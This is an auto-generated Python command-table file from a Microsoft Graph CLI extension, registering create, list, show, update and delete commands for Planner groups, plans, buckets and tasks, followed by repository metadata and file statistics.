|
489f70bf4ede1ce67b84bfb31e66da3e4db76062
|
[
"MIT"
] | 22
|
2022-03-29T22:54:37.000Z
|
2022-03-29T22:55:27.000Z
|
msgraph/cli/command_modules/planner/azext_planner/generated/commands.py
|
microsoftgraph/msgraph-cli-archived
|
489f70bf4ede1ce67b84bfb31e66da3e4db76062
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-statements
# pylint: disable=too-many-locals
# pylint: disable=bad-continuation
# pylint: disable=line-too-long
from azure.cli.core.commands import CliCommandType
from azext_planner.generated._client_factory import (
cf_group,
cf_group_planner,
cf_group_planner_plan,
cf_group_planner_plan_bucket,
cf_group_planner_plan_bucket_task,
cf_group_planner_plan_task,
cf_planner_planner,
cf_planner,
cf_planner_bucket,
cf_planner_bucket_task,
cf_planner_plan,
cf_planner_plan_bucket,
cf_planner_plan_bucket_task,
cf_planner_plan_task,
cf_planner_task,
cf_user,
cf_user_planner,
cf_user_planner_plan,
cf_user_planner_plan_bucket,
cf_user_planner_plan_bucket_task,
cf_user_planner_plan_task,
cf_user_planner_task,
)
planner_group = CliCommandType(
operations_tmpl='azext_planner.vendored_sdks.planner.operations._groups_operations#GroupsOperations.{}',
client_factory=cf_group,
)
planner_group_planner = CliCommandType(
operations_tmpl=(
'azext_planner.vendored_sdks.planner.operations._groups_planner_operations#GroupsPlannerOperations.{}'
),
client_factory=cf_group_planner,
)
planner_group_planner_plan = CliCommandType(
operations_tmpl='azext_planner.vendored_sdks.planner.operations._groups_planner_plans_operations#GroupsPlannerPlansOperations.{}',
client_factory=cf_group_planner_plan,
)
planner_group_planner_plan_bucket = CliCommandType(
operations_tmpl='azext_planner.vendored_sdks.planner.operations._groups_planner_plans_buckets_operations#GroupsPlannerPlansBucketsOperations.{}',
client_factory=cf_group_planner_plan_bucket,
)
planner_group_planner_plan_bucket_task = CliCommandType(
operations_tmpl='azext_planner.vendored_sdks.planner.operations._groups_planner_plans_buckets_tasks_operations#GroupsPlannerPlansBucketsTasksOperations.{}',
client_factory=cf_group_planner_plan_bucket_task,
)
planner_group_planner_plan_task = CliCommandType(
operations_tmpl='azext_planner.vendored_sdks.planner.operations._groups_planner_plans_tasks_operations#GroupsPlannerPlansTasksOperations.{}',
client_factory=cf_group_planner_plan_task,
)
planner_planner_planner = CliCommandType(
operations_tmpl=(
'azext_planner.vendored_sdks.planner.operations._planner_planner_operations#PlannerPlannerOperations.{}'
),
client_factory=cf_planner_planner,
)
planner_planner = CliCommandType(
operations_tmpl='azext_planner.vendored_sdks.planner.operations._planner_operations#PlannerOperations.{}',
client_factory=cf_planner,
)
planner_planner_bucket = CliCommandType(
operations_tmpl=(
'azext_planner.vendored_sdks.planner.operations._planner_buckets_operations#PlannerBucketsOperations.{}'
),
client_factory=cf_planner_bucket,
)
planner_planner_bucket_task = CliCommandType(
operations_tmpl='azext_planner.vendored_sdks.planner.operations._planner_buckets_tasks_operations#PlannerBucketsTasksOperations.{}',
client_factory=cf_planner_bucket_task,
)
planner_planner_plan = CliCommandType(
operations_tmpl=(
'azext_planner.vendored_sdks.planner.operations._planner_plans_operations#PlannerPlansOperations.{}'
),
client_factory=cf_planner_plan,
)
planner_planner_plan_bucket = CliCommandType(
operations_tmpl='azext_planner.vendored_sdks.planner.operations._planner_plans_buckets_operations#PlannerPlansBucketsOperations.{}',
client_factory=cf_planner_plan_bucket,
)
planner_planner_plan_bucket_task = CliCommandType(
operations_tmpl='azext_planner.vendored_sdks.planner.operations._planner_plans_buckets_tasks_operations#PlannerPlansBucketsTasksOperations.{}',
client_factory=cf_planner_plan_bucket_task,
)
planner_planner_plan_task = CliCommandType(
operations_tmpl=(
'azext_planner.vendored_sdks.planner.operations._planner_plans_tasks_operations#PlannerPlansTasksOperations.{}'
),
client_factory=cf_planner_plan_task,
)
planner_planner_task = CliCommandType(
operations_tmpl=(
'azext_planner.vendored_sdks.planner.operations._planner_tasks_operations#PlannerTasksOperations.{}'
),
client_factory=cf_planner_task,
)
planner_user = CliCommandType(
operations_tmpl='azext_planner.vendored_sdks.planner.operations._users_operations#UsersOperations.{}',
client_factory=cf_user,
)
planner_user_planner = CliCommandType(
operations_tmpl=(
'azext_planner.vendored_sdks.planner.operations._users_planner_operations#UsersPlannerOperations.{}'
),
client_factory=cf_user_planner,
)
planner_user_planner_plan = CliCommandType(
operations_tmpl=(
'azext_planner.vendored_sdks.planner.operations._users_planner_plans_operations#UsersPlannerPlansOperations.{}'
),
client_factory=cf_user_planner_plan,
)
planner_user_planner_plan_bucket = CliCommandType(
operations_tmpl='azext_planner.vendored_sdks.planner.operations._users_planner_plans_buckets_operations#UsersPlannerPlansBucketsOperations.{}',
client_factory=cf_user_planner_plan_bucket,
)
planner_user_planner_plan_bucket_task = CliCommandType(
operations_tmpl='azext_planner.vendored_sdks.planner.operations._users_planner_plans_buckets_tasks_operations#UsersPlannerPlansBucketsTasksOperations.{}',
client_factory=cf_user_planner_plan_bucket_task,
)
planner_user_planner_plan_task = CliCommandType(
operations_tmpl='azext_planner.vendored_sdks.planner.operations._users_planner_plans_tasks_operations#UsersPlannerPlansTasksOperations.{}',
client_factory=cf_user_planner_plan_task,
)
planner_user_planner_task = CliCommandType(
operations_tmpl=(
'azext_planner.vendored_sdks.planner.operations._users_planner_tasks_operations#UsersPlannerTasksOperations.{}'
),
client_factory=cf_user_planner_task,
)
def load_command_table(self, _):
with self.command_group('planner group', planner_group, client_factory=cf_group) as g:
g.custom_command('delete-planner', 'planner_group_delete_planner')
g.custom_command('show-planner', 'planner_group_show_planner')
g.custom_command('update-planner', 'planner_group_update_planner')
with self.command_group('planner group-planner', planner_group_planner, client_factory=cf_group_planner) as g:
g.custom_command('create-plan', 'planner_group_planner_create_plan')
g.custom_command('delete-plan', 'planner_group_planner_delete_plan')
g.custom_command('list-plan', 'planner_group_planner_list_plan')
g.custom_command('show-plan', 'planner_group_planner_show_plan')
g.custom_command('update-plan', 'planner_group_planner_update_plan')
with self.command_group(
'planner group-planner-plan', planner_group_planner_plan, client_factory=cf_group_planner_plan
) as g:
g.custom_command('create-bucket', 'planner_group_planner_plan_create_bucket')
g.custom_command('create-task', 'planner_group_planner_plan_create_task')
g.custom_command('delete-bucket', 'planner_group_planner_plan_delete_bucket')
g.custom_command('delete-detail', 'planner_group_planner_plan_delete_detail')
g.custom_command('delete-task', 'planner_group_planner_plan_delete_task')
g.custom_command('list-bucket', 'planner_group_planner_plan_list_bucket')
g.custom_command('list-task', 'planner_group_planner_plan_list_task')
g.custom_command('show-bucket', 'planner_group_planner_plan_show_bucket')
g.custom_command('show-detail', 'planner_group_planner_plan_show_detail')
g.custom_command('show-task', 'planner_group_planner_plan_show_task')
g.custom_command('update-bucket', 'planner_group_planner_plan_update_bucket')
g.custom_command('update-detail', 'planner_group_planner_plan_update_detail')
g.custom_command('update-task', 'planner_group_planner_plan_update_task')
with self.command_group(
'planner group-planner-plan-bucket',
planner_group_planner_plan_bucket,
client_factory=cf_group_planner_plan_bucket,
) as g:
g.custom_command('create-task', 'planner_group_planner_plan_bucket_create_task')
g.custom_command('delete-task', 'planner_group_planner_plan_bucket_delete_task')
g.custom_command('list-task', 'planner_group_planner_plan_bucket_list_task')
g.custom_command('show-task', 'planner_group_planner_plan_bucket_show_task')
g.custom_command('update-task', 'planner_group_planner_plan_bucket_update_task')
with self.command_group(
'planner group-planner-plan-bucket-task',
planner_group_planner_plan_bucket_task,
client_factory=cf_group_planner_plan_bucket_task,
) as g:
g.custom_command(
'delete-assigned-to-task-board-format',
'planner_group_planner_plan_bucket_task_delete_assigned_to_task_board_format',
)
g.custom_command(
'delete-bucket-task-board-format', 'planner_group_planner_plan_bucket_task_delete_bucket_task_board_format'
)
g.custom_command('delete-detail', 'planner_group_planner_plan_bucket_task_delete_detail')
g.custom_command(
'delete-progress-task-board-format',
'planner_group_planner_plan_bucket_task_delete_progress_task_board_format',
)
g.custom_command(
'show-assigned-to-task-board-format',
'planner_group_planner_plan_bucket_task_show_assigned_to_task_board_format',
)
g.custom_command(
'show-bucket-task-board-format', 'planner_group_planner_plan_bucket_task_show_bucket_task_board_format'
)
g.custom_command('show-detail', 'planner_group_planner_plan_bucket_task_show_detail')
g.custom_command(
'show-progress-task-board-format', 'planner_group_planner_plan_bucket_task_show_progress_task_board_format'
)
g.custom_command(
'update-assigned-to-task-board-format',
'planner_group_planner_plan_bucket_task_update_assigned_to_task_board_format',
)
g.custom_command(
'update-bucket-task-board-format', 'planner_group_planner_plan_bucket_task_update_bucket_task_board_format'
)
g.custom_command('update-detail', 'planner_group_planner_plan_bucket_task_update_detail')
g.custom_command(
'update-progress-task-board-format',
'planner_group_planner_plan_bucket_task_update_progress_task_board_format',
)
with self.command_group(
'planner group-planner-plan-task', planner_group_planner_plan_task, client_factory=cf_group_planner_plan_task
) as g:
g.custom_command(
'delete-assigned-to-task-board-format',
'planner_group_planner_plan_task_delete_assigned_to_task_board_format',
)
g.custom_command(
'delete-bucket-task-board-format', 'planner_group_planner_plan_task_delete_bucket_task_board_format'
)
g.custom_command('delete-detail', 'planner_group_planner_plan_task_delete_detail')
g.custom_command(
'delete-progress-task-board-format', 'planner_group_planner_plan_task_delete_progress_task_board_format'
)
g.custom_command(
'show-assigned-to-task-board-format', 'planner_group_planner_plan_task_show_assigned_to_task_board_format'
)
g.custom_command(
'show-bucket-task-board-format', 'planner_group_planner_plan_task_show_bucket_task_board_format'
)
g.custom_command('show-detail', 'planner_group_planner_plan_task_show_detail')
g.custom_command(
'show-progress-task-board-format', 'planner_group_planner_plan_task_show_progress_task_board_format'
)
g.custom_command(
'update-assigned-to-task-board-format',
'planner_group_planner_plan_task_update_assigned_to_task_board_format',
)
g.custom_command(
'update-bucket-task-board-format', 'planner_group_planner_plan_task_update_bucket_task_board_format'
)
g.custom_command('update-detail', 'planner_group_planner_plan_task_update_detail')
g.custom_command(
'update-progress-task-board-format', 'planner_group_planner_plan_task_update_progress_task_board_format'
)
with self.command_group('planner planner', planner_planner_planner, client_factory=cf_planner_planner) as g:
g.custom_command('create', 'planner_planner_create')
g.custom_command('show-planner', 'planner_planner_show_planner')
with self.command_group('planner', planner_planner, client_factory=cf_planner, is_experimental=True) as g:
g.custom_command('create-bucket', 'planner_create_bucket')
g.custom_command('create-plan', 'planner_create_plan')
g.custom_command('create-task', 'planner_create_task')
g.custom_command('delete-bucket', 'planner_delete_bucket')
g.custom_command('delete-plan', 'planner_delete_plan')
g.custom_command('delete-task', 'planner_delete_task')
g.custom_command('list-bucket', 'planner_list_bucket')
g.custom_command('list-plan', 'planner_list_plan')
g.custom_command('list-task', 'planner_list_task')
g.custom_command('show-bucket', 'planner_show_bucket')
g.custom_command('show-plan', 'planner_show_plan')
g.custom_command('show-task', 'planner_show_task')
g.custom_command('update-bucket', 'planner_update_bucket')
g.custom_command('update-plan', 'planner_update_plan')
g.custom_command('update-task', 'planner_update_task')
with self.command_group('planner planner-bucket', planner_planner_bucket, client_factory=cf_planner_bucket) as g:
g.custom_command('create-task', 'planner_planner_bucket_create_task')
g.custom_command('delete-task', 'planner_planner_bucket_delete_task')
g.custom_command('list-task', 'planner_planner_bucket_list_task')
g.custom_command('show-task', 'planner_planner_bucket_show_task')
g.custom_command('update-task', 'planner_planner_bucket_update_task')
with self.command_group(
'planner planner-bucket-task', planner_planner_bucket_task, client_factory=cf_planner_bucket_task
) as g:
g.custom_command(
'delete-assigned-to-task-board-format', 'planner_planner_bucket_task_delete_assigned_to_task_board_format'
)
g.custom_command(
'delete-bucket-task-board-format', 'planner_planner_bucket_task_delete_bucket_task_board_format'
)
g.custom_command('delete-detail', 'planner_planner_bucket_task_delete_detail')
g.custom_command(
'delete-progress-task-board-format', 'planner_planner_bucket_task_delete_progress_task_board_format'
)
g.custom_command(
'show-assigned-to-task-board-format', 'planner_planner_bucket_task_show_assigned_to_task_board_format'
)
g.custom_command('show-bucket-task-board-format', 'planner_planner_bucket_task_show_bucket_task_board_format')
g.custom_command('show-detail', 'planner_planner_bucket_task_show_detail')
g.custom_command(
'show-progress-task-board-format', 'planner_planner_bucket_task_show_progress_task_board_format'
)
g.custom_command(
'update-assigned-to-task-board-format', 'planner_planner_bucket_task_update_assigned_to_task_board_format'
)
g.custom_command(
'update-bucket-task-board-format', 'planner_planner_bucket_task_update_bucket_task_board_format'
)
g.custom_command('update-detail', 'planner_planner_bucket_task_update_detail')
g.custom_command(
'update-progress-task-board-format', 'planner_planner_bucket_task_update_progress_task_board_format'
)
with self.command_group('planner planner-plan', planner_planner_plan, client_factory=cf_planner_plan) as g:
g.custom_command('create-bucket', 'planner_planner_plan_create_bucket')
g.custom_command('create-task', 'planner_planner_plan_create_task')
g.custom_command('delete-bucket', 'planner_planner_plan_delete_bucket')
g.custom_command('delete-detail', 'planner_planner_plan_delete_detail')
g.custom_command('delete-task', 'planner_planner_plan_delete_task')
g.custom_command('list-bucket', 'planner_planner_plan_list_bucket')
g.custom_command('list-task', 'planner_planner_plan_list_task')
g.custom_command('show-bucket', 'planner_planner_plan_show_bucket')
g.custom_command('show-detail', 'planner_planner_plan_show_detail')
g.custom_command('show-task', 'planner_planner_plan_show_task')
g.custom_command('update-bucket', 'planner_planner_plan_update_bucket')
g.custom_command('update-detail', 'planner_planner_plan_update_detail')
g.custom_command('update-task', 'planner_planner_plan_update_task')
with self.command_group(
'planner planner-plan-bucket', planner_planner_plan_bucket, client_factory=cf_planner_plan_bucket
) as g:
g.custom_command('create-task', 'planner_planner_plan_bucket_create_task')
g.custom_command('delete-task', 'planner_planner_plan_bucket_delete_task')
g.custom_command('list-task', 'planner_planner_plan_bucket_list_task')
g.custom_command('show-task', 'planner_planner_plan_bucket_show_task')
g.custom_command('update-task', 'planner_planner_plan_bucket_update_task')
with self.command_group(
'planner planner-plan-bucket-task', planner_planner_plan_bucket_task, client_factory=cf_planner_plan_bucket_task
) as g:
g.custom_command(
'delete-assigned-to-task-board-format',
'planner_planner_plan_bucket_task_delete_assigned_to_task_board_format',
)
g.custom_command(
'delete-bucket-task-board-format', 'planner_planner_plan_bucket_task_delete_bucket_task_board_format'
)
g.custom_command('delete-detail', 'planner_planner_plan_bucket_task_delete_detail')
g.custom_command(
'delete-progress-task-board-format', 'planner_planner_plan_bucket_task_delete_progress_task_board_format'
)
g.custom_command(
'show-assigned-to-task-board-format', 'planner_planner_plan_bucket_task_show_assigned_to_task_board_format'
)
g.custom_command(
'show-bucket-task-board-format', 'planner_planner_plan_bucket_task_show_bucket_task_board_format'
)
g.custom_command('show-detail', 'planner_planner_plan_bucket_task_show_detail')
g.custom_command(
'show-progress-task-board-format', 'planner_planner_plan_bucket_task_show_progress_task_board_format'
)
g.custom_command(
'update-assigned-to-task-board-format',
'planner_planner_plan_bucket_task_update_assigned_to_task_board_format',
)
g.custom_command(
'update-bucket-task-board-format', 'planner_planner_plan_bucket_task_update_bucket_task_board_format'
)
g.custom_command('update-detail', 'planner_planner_plan_bucket_task_update_detail')
g.custom_command(
'update-progress-task-board-format', 'planner_planner_plan_bucket_task_update_progress_task_board_format'
)
with self.command_group(
'planner planner-plan-task', planner_planner_plan_task, client_factory=cf_planner_plan_task
) as g:
g.custom_command(
'delete-assigned-to-task-board-format', 'planner_planner_plan_task_delete_assigned_to_task_board_format'
)
g.custom_command('delete-bucket-task-board-format', 'planner_planner_plan_task_delete_bucket_task_board_format')
g.custom_command('delete-detail', 'planner_planner_plan_task_delete_detail')
g.custom_command(
'delete-progress-task-board-format', 'planner_planner_plan_task_delete_progress_task_board_format'
)
g.custom_command(
'show-assigned-to-task-board-format', 'planner_planner_plan_task_show_assigned_to_task_board_format'
)
g.custom_command('show-bucket-task-board-format', 'planner_planner_plan_task_show_bucket_task_board_format')
g.custom_command('show-detail', 'planner_planner_plan_task_show_detail')
g.custom_command('show-progress-task-board-format', 'planner_planner_plan_task_show_progress_task_board_format')
g.custom_command(
'update-assigned-to-task-board-format', 'planner_planner_plan_task_update_assigned_to_task_board_format'
)
g.custom_command('update-bucket-task-board-format', 'planner_planner_plan_task_update_bucket_task_board_format')
g.custom_command('update-detail', 'planner_planner_plan_task_update_detail')
g.custom_command(
'update-progress-task-board-format', 'planner_planner_plan_task_update_progress_task_board_format'
)
with self.command_group('planner planner-task', planner_planner_task, client_factory=cf_planner_task) as g:
g.custom_command(
'delete-assigned-to-task-board-format', 'planner_planner_task_delete_assigned_to_task_board_format'
)
g.custom_command('delete-bucket-task-board-format', 'planner_planner_task_delete_bucket_task_board_format')
g.custom_command('delete-detail', 'planner_planner_task_delete_detail')
g.custom_command('delete-progress-task-board-format', 'planner_planner_task_delete_progress_task_board_format')
g.custom_command(
'show-assigned-to-task-board-format', 'planner_planner_task_show_assigned_to_task_board_format'
)
g.custom_command('show-bucket-task-board-format', 'planner_planner_task_show_bucket_task_board_format')
g.custom_command('show-detail', 'planner_planner_task_show_detail')
g.custom_command('show-progress-task-board-format', 'planner_planner_task_show_progress_task_board_format')
g.custom_command(
'update-assigned-to-task-board-format', 'planner_planner_task_update_assigned_to_task_board_format'
)
g.custom_command('update-bucket-task-board-format', 'planner_planner_task_update_bucket_task_board_format')
g.custom_command('update-detail', 'planner_planner_task_update_detail')
g.custom_command('update-progress-task-board-format', 'planner_planner_task_update_progress_task_board_format')
with self.command_group('planner user', planner_user, client_factory=cf_user) as g:
g.custom_command('delete-planner', 'planner_user_delete_planner')
g.custom_command('show-planner', 'planner_user_show_planner')
g.custom_command('update-planner', 'planner_user_update_planner')
with self.command_group('planner user-planner', planner_user_planner, client_factory=cf_user_planner) as g:
g.custom_command('create-plan', 'planner_user_planner_create_plan')
g.custom_command('create-task', 'planner_user_planner_create_task')
g.custom_command('delete-plan', 'planner_user_planner_delete_plan')
g.custom_command('delete-task', 'planner_user_planner_delete_task')
g.custom_command('list-plan', 'planner_user_planner_list_plan')
g.custom_command('list-task', 'planner_user_planner_list_task')
g.custom_command('show-plan', 'planner_user_planner_show_plan')
g.custom_command('show-task', 'planner_user_planner_show_task')
g.custom_command('update-plan', 'planner_user_planner_update_plan')
g.custom_command('update-task', 'planner_user_planner_update_task')
with self.command_group(
'planner user-planner-plan', planner_user_planner_plan, client_factory=cf_user_planner_plan
) as g:
g.custom_command('create-bucket', 'planner_user_planner_plan_create_bucket')
g.custom_command('create-task', 'planner_user_planner_plan_create_task')
g.custom_command('delete-bucket', 'planner_user_planner_plan_delete_bucket')
g.custom_command('delete-detail', 'planner_user_planner_plan_delete_detail')
g.custom_command('delete-task', 'planner_user_planner_plan_delete_task')
g.custom_command('list-bucket', 'planner_user_planner_plan_list_bucket')
g.custom_command('list-task', 'planner_user_planner_plan_list_task')
g.custom_command('show-bucket', 'planner_user_planner_plan_show_bucket')
g.custom_command('show-detail', 'planner_user_planner_plan_show_detail')
g.custom_command('show-task', 'planner_user_planner_plan_show_task')
g.custom_command('update-bucket', 'planner_user_planner_plan_update_bucket')
g.custom_command('update-detail', 'planner_user_planner_plan_update_detail')
g.custom_command('update-task', 'planner_user_planner_plan_update_task')
with self.command_group(
'planner user-planner-plan-bucket', planner_user_planner_plan_bucket, client_factory=cf_user_planner_plan_bucket
) as g:
g.custom_command('create-task', 'planner_user_planner_plan_bucket_create_task')
g.custom_command('delete-task', 'planner_user_planner_plan_bucket_delete_task')
g.custom_command('list-task', 'planner_user_planner_plan_bucket_list_task')
g.custom_command('show-task', 'planner_user_planner_plan_bucket_show_task')
g.custom_command('update-task', 'planner_user_planner_plan_bucket_update_task')
with self.command_group(
'planner user-planner-plan-bucket-task',
planner_user_planner_plan_bucket_task,
client_factory=cf_user_planner_plan_bucket_task,
) as g:
g.custom_command(
'delete-assigned-to-task-board-format',
'planner_user_planner_plan_bucket_task_delete_assigned_to_task_board_format',
)
g.custom_command(
'delete-bucket-task-board-format', 'planner_user_planner_plan_bucket_task_delete_bucket_task_board_format'
)
g.custom_command('delete-detail', 'planner_user_planner_plan_bucket_task_delete_detail')
g.custom_command(
'delete-progress-task-board-format',
'planner_user_planner_plan_bucket_task_delete_progress_task_board_format',
)
g.custom_command(
'show-assigned-to-task-board-format',
'planner_user_planner_plan_bucket_task_show_assigned_to_task_board_format',
)
g.custom_command(
'show-bucket-task-board-format', 'planner_user_planner_plan_bucket_task_show_bucket_task_board_format'
)
g.custom_command('show-detail', 'planner_user_planner_plan_bucket_task_show_detail')
g.custom_command(
'show-progress-task-board-format', 'planner_user_planner_plan_bucket_task_show_progress_task_board_format'
)
g.custom_command(
'update-assigned-to-task-board-format',
'planner_user_planner_plan_bucket_task_update_assigned_to_task_board_format',
)
g.custom_command(
'update-bucket-task-board-format', 'planner_user_planner_plan_bucket_task_update_bucket_task_board_format'
)
g.custom_command('update-detail', 'planner_user_planner_plan_bucket_task_update_detail')
g.custom_command(
'update-progress-task-board-format',
'planner_user_planner_plan_bucket_task_update_progress_task_board_format',
)
with self.command_group(
'planner user-planner-plan-task', planner_user_planner_plan_task, client_factory=cf_user_planner_plan_task
) as g:
g.custom_command(
'delete-assigned-to-task-board-format',
'planner_user_planner_plan_task_delete_assigned_to_task_board_format',
)
g.custom_command(
'delete-bucket-task-board-format', 'planner_user_planner_plan_task_delete_bucket_task_board_format'
)
g.custom_command('delete-detail', 'planner_user_planner_plan_task_delete_detail')
g.custom_command(
'delete-progress-task-board-format', 'planner_user_planner_plan_task_delete_progress_task_board_format'
)
g.custom_command(
'show-assigned-to-task-board-format', 'planner_user_planner_plan_task_show_assigned_to_task_board_format'
)
g.custom_command(
'show-bucket-task-board-format', 'planner_user_planner_plan_task_show_bucket_task_board_format'
)
g.custom_command('show-detail', 'planner_user_planner_plan_task_show_detail')
g.custom_command(
'show-progress-task-board-format', 'planner_user_planner_plan_task_show_progress_task_board_format'
)
g.custom_command(
'update-assigned-to-task-board-format',
'planner_user_planner_plan_task_update_assigned_to_task_board_format',
)
g.custom_command(
'update-bucket-task-board-format', 'planner_user_planner_plan_task_update_bucket_task_board_format'
)
g.custom_command('update-detail', 'planner_user_planner_plan_task_update_detail')
g.custom_command(
'update-progress-task-board-format', 'planner_user_planner_plan_task_update_progress_task_board_format'
)
with self.command_group(
'planner user-planner-task', planner_user_planner_task, client_factory=cf_user_planner_task
) as g:
g.custom_command(
'delete-assigned-to-task-board-format', 'planner_user_planner_task_delete_assigned_to_task_board_format'
)
g.custom_command('delete-bucket-task-board-format', 'planner_user_planner_task_delete_bucket_task_board_format')
g.custom_command('delete-detail', 'planner_user_planner_task_delete_detail')
g.custom_command(
'delete-progress-task-board-format', 'planner_user_planner_task_delete_progress_task_board_format'
)
g.custom_command(
'show-assigned-to-task-board-format', 'planner_user_planner_task_show_assigned_to_task_board_format'
)
g.custom_command('show-bucket-task-board-format', 'planner_user_planner_task_show_bucket_task_board_format')
g.custom_command('show-detail', 'planner_user_planner_task_show_detail')
g.custom_command('show-progress-task-board-format', 'planner_user_planner_task_show_progress_task_board_format')
g.custom_command(
'update-assigned-to-task-board-format', 'planner_user_planner_task_update_assigned_to_task_board_format'
)
g.custom_command('update-bucket-task-board-format', 'planner_user_planner_task_update_bucket_task_board_format')
g.custom_command('update-detail', 'planner_user_planner_task_update_detail')
g.custom_command(
'update-progress-task-board-format', 'planner_user_planner_task_update_progress_task_board_format'
)
| 50.37299
| 160
| 0.749713
| 3,899
| 31,332
| 5.505001
| 0.030008
| 0.066856
| 0.133712
| 0.083023
| 0.922428
| 0.888278
| 0.848258
| 0.806886
| 0.776556
| 0.727544
| 0
| 0
| 0.155017
| 31,332
| 621
| 161
| 50.454106
| 0.810727
| 0.018192
| 0
| 0.244898
| 0
| 0
| 0.534149
| 0.469787
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001855
| false
| 0
| 0.003711
| 0
| 0.005566
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.